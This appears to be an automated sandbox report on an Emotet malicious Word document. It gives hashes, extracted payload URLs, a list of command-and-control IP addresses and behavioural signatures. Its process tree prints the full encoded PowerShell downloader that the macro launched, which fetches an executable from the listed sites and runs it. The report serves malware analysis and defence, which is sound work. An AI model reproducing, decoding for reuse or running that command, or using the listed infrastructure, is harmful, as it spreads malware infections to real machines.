Analysis
-
max time kernel
139s -
max time network
135s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
01-08-2020 01:40
Static task
static1
Behavioral task
behavioral1
Sample
emotet_e3_d52a1de110730672fa2b272977caf41a8d511f9a9f8194bd5ac999635ecacea4_2020-08-01__014040._doc.doc
Resource
win7v200722
General
-
Target
emotet_e3_d52a1de110730672fa2b272977caf41a8d511f9a9f8194bd5ac999635ecacea4_2020-08-01__014040._doc.doc
-
Size
174KB
-
MD5
99ad9bf656cab7595feca20f02bf4b9e
-
SHA1
62ce98b10331a77d3f71eaffbc4862c0e89e1a8b
-
SHA256
d52a1de110730672fa2b272977caf41a8d511f9a9f8194bd5ac999635ecacea4
-
SHA512
905999d91251c35ae1459dc24dcf509fa0dde1e6b0ff5f2d351f355afc11d6273f81e2d77b0fa6bbc639b75db8eecdab9fc862543c3795c6ec2a46962ccd6f14
Malware Config
Extracted
http://prolicitar.com.br/privilege/VwWMjYDU/
http://proreclame.nl/assets/Riw/
http://www.meltonian.net/Blog/Zaviixl730/
http://www.mollymoody.com/iRVKRMq/
https://mwrouse.com/cs2300/qVJaPCy/
Extracted
emotet
187.64.128.197:80
198.57.203.63:8080
163.172.107.70:8080
212.112.113.235:80
157.7.164.178:8081
181.167.35.84:80
212.156.133.218:80
185.142.236.163:443
181.143.101.19:8080
75.127.14.170:8080
115.165.3.213:80
190.55.233.156:80
139.59.12.63:8080
144.139.91.187:80
37.70.131.107:80
181.113.229.139:443
41.185.29.128:8080
177.37.81.212:443
5.79.70.250:8080
78.188.170.128:80
190.111.215.4:8080
50.116.78.109:8080
75.139.38.211:80
140.207.113.106:443
192.241.220.183:8080
192.210.217.94:8080
81.17.93.134:80
181.164.110.7:80
190.164.75.175:80
201.214.108.231:80
94.96.60.191:80
192.163.221.191:8080
91.83.93.103:443
51.38.201.19:7080
24.157.25.203:80
81.214.253.80:443
87.106.231.60:8080
37.46.129.215:8080
195.201.56.70:8080
201.235.10.215:80
107.161.30.122:8080
113.160.180.109:80
87.252.100.28:80
115.79.195.246:80
113.161.148.81:80
74.208.173.91:8080
46.105.131.68:8080
172.105.78.244:8080
189.146.1.78:443
216.75.37.196:8080
203.153.216.182:7080
153.220.182.49:80
181.134.9.162:80
178.33.167.120:8080
46.49.124.53:80
143.95.101.72:8080
77.74.78.80:443
203.153.216.178:7080
179.5.118.12:80
24.232.36.99:80
177.144.130.105:443
46.32.229.152:8080
89.108.158.234:8080
Signatures
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 648 WINWORD.EXE 648 WINWORD.EXE -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3912 1188 powersheLL.exe 66 -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3912 powersheLL.exe -
Blacklisted process makes network request 2 IoCs
flow pid Process 22 3912 powersheLL.exe 24 3912 powersheLL.exe -
Executes dropped EXE 2 IoCs
pid Process 412 751.exe 4000 winbrand.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 412 wrote to memory of 4000 412 751.exe 78 PID 412 wrote to memory of 4000 412 751.exe 78 PID 412 wrote to memory of 4000 412 751.exe 78 -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious use of SetWindowsHookEx 11 IoCs
pid Process 648 WINWORD.EXE 648 WINWORD.EXE 648 WINWORD.EXE 648 WINWORD.EXE 648 WINWORD.EXE 648 WINWORD.EXE 648 WINWORD.EXE 648 WINWORD.EXE 648 WINWORD.EXE 412 751.exe 4000 winbrand.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 3912 powersheLL.exe 3912 powersheLL.exe 3912 powersheLL.exe 4000 winbrand.exe 4000 winbrand.exe 4000 winbrand.exe 4000 winbrand.exe 4000 winbrand.exe 4000 winbrand.exe -
Emotet Payload 4 IoCs
Detects Emotet payload in memory.
resource yara_rule behavioral2/memory/412-8-0x00000000021A0000-0x00000000021AC000-memory.dmp emotet behavioral2/memory/412-8-0x00000000021A0000-0x00000000021AC000-memory.dmp emotet behavioral2/memory/4000-11-0x00000000005C0000-0x00000000005CC000-memory.dmp emotet behavioral2/memory/4000-11-0x00000000005C0000-0x00000000005CC000-memory.dmp emotet -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\aeevts\winbrand.exe 751.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e3_d52a1de110730672fa2b272977caf41a8d511f9a9f8194bd5ac999635ecacea4_2020-08-01__014040._doc.doc" /o ""1⤵
- Suspicious behavior: AddClipboardFormatListener
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Checks processor information in registry
PID:648
-
C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exepowersheLL -e JABWAE0AQgBBAE8AaABvAHcAPQAnAEEASgBEAFEAUwBrAHMAdQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAYwBVAGAAUgBJAGAAVAB5AHAAYABSAE8AVABPAGMAYABPAGwAIgAgAD0AIAAnAHQAbABzADEAMgAsACAAdABsAHMAMQAxACwAIAB0AGwAcwAnADsAJABIAFAATABCAEkAYQB6AGcAIAA9ACAAJwA3ADUAMQAnADsAJABNAEwASgBUAFoAeQB4AGgAPQAnAFcATABMAFkATQBkAGUAZgAnADsAJABXAEgATgBDAFcAYwBqAHIAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEgAUABMAEIASQBhAHoAZwArACcALgBlAHgAZQAnADsAJABWAFQARgBOAEEAdwBqAGkAPQAnAFEAVwBBAEoATgBoAHAAdAAnADsAJABIAFcAVQBTAEMAcgBxAGEAPQAuACgAJwBuAGUAdwAnACsAJwAtAG8AYgBqAGUAJwArACcAYwB0ACcAKQAgAE4ARQB0AC4AdwBlAGIAQwBsAGkARQBuAHQAOwAkAFAASQBMAEQAUQBzAGYAeAA9ACcAaAB0AHQAcAA6AC8ALwBwAHIAbwBsAGkAYwBpAHQAYQByAC4AYwBvAG0ALgBiAHIALwBwAHIAaQB2AGkAbABlAGcAZQAvAFYAdwBXAE0AagBZAEQAVQAvACoAaAB0AHQAcAA6AC8ALwBwAHIAbwByAGUAYwBsAGEAbQBlAC4AbgBsAC8AYQBzAHMAZQB0AHMALwBSAGkAdwAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAG0AZQBsAHQAbwBuAGkAYQBuAC4AbgBlAHQALwBCAGwAbwBnAC8AWgBhAHYAaQBpAHgAbAA3ADMAMAAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAG0AbwBsAGwAeQBtAG8AbwBkAHkALgBjAG8AbQAvAGkAUgBWAEsAUgBNAHEALwAqAGgAdAB0AHAAcwA6AC8ALwBtAHcAcgBvAHUAcwBlAC4AYwBvAG0ALwBjAHMAMgAzADAAMAAvAHEAVgBKAGEAUABDAHkALwAnAC4AIgBzAGAAUABMAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAE0AUwBCAEIAUQBhAHoAegA9ACcATwBMAFEATgBPAGYAdgB5ACcAOwBmAG8AcgBlAGEAYwBoACgAJABZAFQATQBYAFQAZQB6AHMAIABpAG4AIAAkAFAASQBMAEQAUQBzAGYAeAApAHsAdAByAHkAewAkAEgAVwBVAFMAQwByAHEAYQAuACIARABgAG8AVwBuAGwATwBBAGAARABmAGkAYABMAEUAIgAoACQAWQBUAE0AWABUAGUAegBzACwAIAAkAFcASABOAEMAVwBjAGoAcgApADsAJABFAFkATABOAEsAcgBpAGgAPQAnAE8ATgBYAEUASgB0AHAAcgAnADsASQBmACAAKAAoACYAKAAnAEcAJwArACcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAFcASABOAEMAVwBjAGoAcgApAC4AIgBMAGUAYABOAEcAdABoACIAIAAtAGcAZQAgADIAOQA2ADAANAApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAQwBSAEUAYABBAHQAZQAiACgAJABXAEgATgBDAFcAYwBqAHIAKQA7ACQAVQBEAEYATwBBAGIAdQB3AD0AJwBEAEgAVgBPAFAAZwBrAHUAJwA7AGIAcgBlAGEAawA7ACQAWQBJAEsAUwBKAG8AawBtAD0AJwBKAEMAWABYAFcAdAB6AGUAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWQBLAEsATABQAHUAagBkAD0AJwBUAFoASQBYAFkAeQBsAHMAJwA=1⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:3912
-
C:\Users\Admin\751.exeC:\Users\Admin\751.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
- Drops file in System32 directory
PID:412 -
C:\Windows\SysWOW64\aeevts\winbrand.exe"C:\Windows\SysWOW64\aeevts\winbrand.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EnumeratesProcesses
PID:4000
-